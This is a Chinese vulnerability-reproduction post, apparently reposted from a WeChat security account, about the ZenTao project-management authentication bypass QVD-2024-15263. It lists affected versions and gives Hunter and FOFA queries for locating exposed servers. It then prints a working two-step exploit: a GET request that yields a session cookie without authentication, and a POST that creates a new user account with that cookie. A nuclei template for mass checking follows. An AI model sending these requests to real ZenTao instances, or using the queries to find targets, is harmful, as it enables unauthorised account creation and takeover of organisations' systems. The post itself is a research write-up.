一：漏洞名称

禅道项目管理系统身份认证绕过漏洞复现(QVD-2024-15263)

二：漏洞描述

禅道系统中存在的漏洞使得未经授权的用户能够绕过认证流程，创建管理员账户并接管后台，进而可能导致远程代码执行等严重安全问题，可能引发数据泄露和网络攻击。需要及时修复以确保系统安全。

三：漏洞影响版本

16.x <= 禅道项目管理系统 < 18.12（开源版）6.x  <= 禅道项目管理系统 < 8.12（企业版）3.x  <= 禅道项目管理系统 < 4.12（旗舰版）

四：网络空间测绘查询

hunter  app.name="ZenTao 禅道"

Windos环境搭建https://www.zentao.net/dl/zentao/18.10/ZenTaoPMS-18.10-zbox.win64.exe

五：漏洞复现

GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy HTTP/1.1Host: 127.0.0.1Content-Length: 0

身份认证绕过漏洞通常是由于系统在处理用户身份验证时存在缺陷或漏洞而导致的。一种常见的原理是在某些API或功能中，系统未能正确地验证用户的身份信息，或者验证机制本身存在缺陷。

POC2：

创建用户

POST /zentao/api.php/v1/users HTTP/1.1Host: 127.0.0.1Cookie: zentaosid=第一步获取的cookie;Content-Length: 83{"account":"hard","password":"123456Qwe..","realname":"hard","role":"","group":"2"}

获取批量验证脚本

id: easycorp-zentao-pms-idor

info:
  name: 禅道项目管理系统身份认证绕过漏洞
  author: GuoRong_X
  severity: critical
  description: |
    - 禅道系统某些API设计为通过特定的鉴权函数进行验证，但在实际实现中，这个鉴权函数在鉴权失败后并不中断请求，而是仅返回一个错误标志，这个返回值在后续没有被适当处理。此外，该系统在处理某些API时未能有效检查用户身份，允许未认证的用户执行某些操作，从而绕过鉴权机制。
  reference:
    - https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw
  metadata:
    verified: true
    fofa-query: title="用户登录- 禅道"
  tags: zentao

http:
  - method: GET
    path:
      - "{{BaseURL}}/zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Set-Cookie: zentaosid='

      - type: status
        status:
          - 200

链接：https://pan.baidu.com/s/1voWRnYlUqPXcwmPOsI-XwQ 提取码：u7v3

原文始发于微信公众号（Adler学安全）：漏洞复现-禅道身份认证绕过漏洞